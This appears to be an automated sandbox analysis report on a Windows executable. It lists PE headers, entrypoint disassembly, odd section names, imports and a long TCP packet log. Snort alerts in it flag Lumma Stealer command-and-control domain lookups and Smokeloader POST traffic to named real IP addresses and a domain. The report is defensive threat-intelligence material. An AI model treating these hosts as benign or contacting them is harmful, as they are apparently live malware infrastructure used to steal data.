                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                    File Version Major:5
                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                    Import Hash:c50fc44c4cf7f76a6615cc583b65389f

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    call 00007F22CCD2CDB3h
                                                                                                                                                                    jmp 00007F22CCD29EBEh
                                                                                                                                                                    mov edi, edi
                                                                                                                                                                    push ebp
                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                    sub esp, 00000328h
                                                                                                                                                                    mov dword ptr [0042E158h], eax
                                                                                                                                                                    mov dword ptr [0042E154h], ecx
                                                                                                                                                                    mov dword ptr [0042E150h], edx
                                                                                                                                                                    mov dword ptr [0042E14Ch], ebx
                                                                                                                                                                    mov dword ptr [0042E148h], esi
                                                                                                                                                                    mov dword ptr [0042E144h], edi
                                                                                                                                                                    mov word ptr [0042E170h], ss
                                                                                                                                                                    mov word ptr [0042E164h], cs
                                                                                                                                                                    mov word ptr [0042E140h], ds
                                                                                                                                                                    mov word ptr [0042E13Ch], es
                                                                                                                                                                    mov word ptr [0042E138h], fs
                                                                                                                                                                    mov word ptr [0042E134h], gs
                                                                                                                                                                    pushfd
                                                                                                                                                                    pop dword ptr [0042E168h]
                                                                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                                                                    mov dword ptr [0042E15Ch], eax
                                                                                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                                                                                    mov dword ptr [0042E160h], eax
                                                                                                                                                                    lea eax, dword ptr [ebp+08h]
                                                                                                                                                                    mov dword ptr [0042E16Ch], eax
                                                                                                                                                                    mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                    mov dword ptr [0042E0A8h], 00010001h
                                                                                                                                                                    mov eax, dword ptr [0042E160h]
                                                                                                                                                                    mov dword ptr [0042E05Ch], eax
                                                                                                                                                                    mov dword ptr [0042E050h], C0000409h
                                                                                                                                                                    mov dword ptr [0042E054h], 00000001h
                                                                                                                                                                    mov eax, dword ptr [0042C004h]
                                                                                                                                                                    mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                    mov eax, dword ptr [0042C008h]
                                                                                                                                                                    mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                    call dword ptr [000000C4h]

                                                                                                                                                                    Rich Headers

                                                                                                                                                                    Programming Language:
                                                                                                                                                                    • [C++] VS2010 build 30319
                                                                                                                                                                    • [ASM] VS2010 build 30319
                                                                                                                                                                    • [ C ] VS2010 build 30319
                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                    • [RES] VS2010 build 30319
                                                                                                                                                                    • [LNK] VS2010 build 30319

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2abe40x50.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000xf0a8.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x2a7480x18.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x280000x1a8.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000x26ede0x27000a6cbe1dfaa20f257003ab792e7fffe06False0.6613331330128205data7.151495344283166IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rdata0x280000x35c60x3600f09a978953066f99a85ec096ece99719False0.37883391203703703data5.105177136960447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x2c0000x80440x2200b5db5ec5ace6b52cade60bc717051f08False0.18910845588235295data2.11101945749082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .vufugag0x350000x7c0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .tls0x360000x9cd0xa00a371492f16c0940507435909603efe88False0.009375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .jeyup0x370000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rsrc0x380000xf0a80xf200a37f74062f8aeb7185ac803e4e1183d9False0.5807076446280992data5.893495628823441IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_ICON0x385800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.74906191369606
                                                                                                                                                                    RT_ICON0x396400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.45149253731343286
                                                                                                                                                                    RT_ICON0x3a4e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5744584837545126
                                                                                                                                                                    RT_ICON0x3ad900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.6203917050691244
                                                                                                                                                                    RT_ICON0x3b4580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.6777456647398844
                                                                                                                                                                    RT_ICON0x3b9c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.49522821576763487
                                                                                                                                                                    RT_ICON0x3df680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5647279549718575
                                                                                                                                                                    RT_ICON0x3f0100x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.594672131147541
                                                                                                                                                                    RT_ICON0x3f9980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6223404255319149
                                                                                                                                                                    RT_ICON0x3fe780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.39952025586353945
                                                                                                                                                                    RT_ICON0x40d200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.5640794223826715
                                                                                                                                                                    RT_ICON0x415c80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.6140552995391705
                                                                                                                                                                    RT_ICON0x41c900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.6510115606936416
                                                                                                                                                                    RT_ICON0x421f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.6283195020746888
                                                                                                                                                                    RT_ICON0x447a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.649624765478424
                                                                                                                                                                    RT_ICON0x458480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6631147540983606
                                                                                                                                                                    RT_ICON0x461d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7056737588652482
                                                                                                                                                                    RT_STRING0x468d00xb0dataEnglishUnited States0.5568181818181818
                                                                                                                                                                    RT_STRING0x469800x35edataEnglishUnited States0.462877030162413
                                                                                                                                                                    RT_STRING0x46ce00x3c6dataEnglishUnited States0.45445134575569357
                                                                                                                                                                    RT_ACCELERATOR0x466b00x20dataEnglishUnited States1.15625
                                                                                                                                                                    RT_GROUP_ICON0x396280x14dataEnglishUnited States1.1
                                                                                                                                                                    RT_GROUP_ICON0x3fe000x76dataEnglishUnited States0.6694915254237288
                                                                                                                                                                    RT_GROUP_ICON0x466380x76dataEnglishUnited States0.6694915254237288
                                                                                                                                                                    RT_VERSION0x466e00x1f0MS Windows COFF PowerPC object fileEnglishUnited States0.5665322580645161
                                                                                                                                                                    None0x466d00xadataEnglishUnited States1.8

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    KERNEL32.dllMoveFileExW, OpenJobObjectA, SetDefaultCommConfigW, CreateDirectoryW, FreeEnvironmentStringsA, GetTickCount, GetConsoleAliasesLengthA, TzSpecificLocalTimeToSystemTime, GetSystemTimes, WideCharToMultiByte, LoadLibraryW, GetLocaleInfoW, CompareStringW, GetStartupInfoW, FlushFileBuffers, GetConsoleAliasesW, SetLastError, InterlockedIncrement, GetProcessHeaps, CreateNamedPipeA, EnumDateFormatsExA, ResetEvent, LoadLibraryA, GetProcessWorkingSetSize, OpenWaitableTimerW, LocalAlloc, DnsHostnameToComputerNameA, SetCurrentDirectoryW, FreeEnvironmentStringsW, GetCurrentDirectoryA, EndUpdateResourceA, FileTimeToLocalFileTime, GetVolumeInformationW, IsValidLocale, EnumSystemLocalesA, HeapAlloc, GetProcAddress, GetModuleHandleExA, EncodePointer, DecodePointer, GetCommandLineA, HeapSetInformation, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, HeapDestroy, Sleep, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameA, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, GetCurrentThread, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, FatalAppExitA, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, HeapReAlloc, RtlUnwind, HeapFree, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetConsoleCP, GetConsoleMode, LCMapStringW, MultiByteToWideChar, GetStringTypeW, SetFilePointer, IsProcessorFeaturePresent, CloseHandle, WriteConsoleW, SetStdHandle, CreateFileW, GetUserDefaultLCID, GetLocaleInfoA, RaiseException
                                                                                                                                                                    USER32.dllGetClassLongW
                                                                                                                                                                    ADVAPI32.dllGetServiceKeyNameW, ReadEventLogA

                                                                                                                                                                    Possible Origin

                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                    192.168.2.3172.67.221.3549717802019714 02/08/24-19:08:47.917372TCP2019714ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile4971780192.168.2.3172.67.221.35
                                                                                                                                                                    192.168.2.3104.21.80.171497154432050574 02/08/24-19:08:47.171628TCP2050574ET TROJAN Observed Lumma Stealer Related Domain (gemcreedarticulateod .shop in TLS SNI)49715443192.168.2.3104.21.80.171
                                                                                                                                                                    192.168.2.31.1.1.154225532050567 02/08/24-19:08:47.042247UDP2050567ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (gemcreedarticulateod .shop)5422553192.168.2.31.1.1.1
                                                                                                                                                                    192.168.2.391.215.85.12049711802039103 02/08/24-19:08:47.388216TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971180192.168.2.391.215.85.120

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Feb 8, 2024 19:08:40.817347050 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.055182934 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.055540085 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.056437969 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.056557894 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.294249058 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.294265032 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.312629938 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.318748951 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.318829060 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.556583881 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.574143887 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.578783989 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.578900099 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.816715956 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836065054 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836092949 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836107016 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836124897 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836139917 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.836242914 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836256981 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836270094 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836287022 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836291075 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.836291075 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:41.836302042 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836318016 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:41.836359978 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074091911 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074119091 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074134111 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074150085 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074163914 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074177027 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074191093 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074197054 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074197054 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074209929 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074223995 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074239016 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074249983 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074249983 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074292898 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074306965 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074361086 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074361086 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074381113 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074394941 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074508905 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074523926 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074536085 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074551105 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074557066 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074557066 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074565887 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074579000 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.074609995 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.074609995 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312104940 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312124968 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312138081 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312153101 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312179089 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312192917 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312195063 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312206030 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312222958 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312277079 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312277079 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312283993 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312355042 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312367916 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312381029 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312393904 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312396049 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312419891 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312489986 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312505007 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312517881 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312540054 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312542915 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312565088 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312570095 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312583923 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312608004 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312634945 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312645912 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312711954 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312726021 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312740088 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312757015 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312772989 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312788963 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312803984 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312818050 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312830925 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312839031 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312860012 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312882900 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312882900 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312916040 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312928915 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312944889 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312972069 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.312978983 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.312978983 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.313010931 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.313045979 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.313060999 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.313077927 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.313085079 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.313101053 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.313128948 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.313149929 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.313164949 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.313177109 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.313218117 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550029993 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550045967 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550059080 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550071955 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550163984 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550194979 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550209999 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550224066 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550239086 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550261974 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550261974 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550312996 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550370932 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550385952 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550400019 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550415039 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550434113 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550440073 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550455093 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550467968 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550522089 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550537109 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550556898 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550635099 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550808907 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550822973 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550834894 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550848007 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550863028 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550877094 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550878048 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550890923 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550904036 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550906897 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550920963 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550936937 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550951004 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.550964117 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550964117 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550983906 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.550997019 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.551011086 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.551023960 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.551037073 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.551043987 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.551050901 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.551064968 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.551081896 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.551095963 CET804971191.215.85.120192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:42.551099062 CET4971180192.168.2.391.215.85.120
                                                                                                                                                                    Feb 8, 2024 19:08:42.551099062 CET4971180192.168.2.391.215.85.120
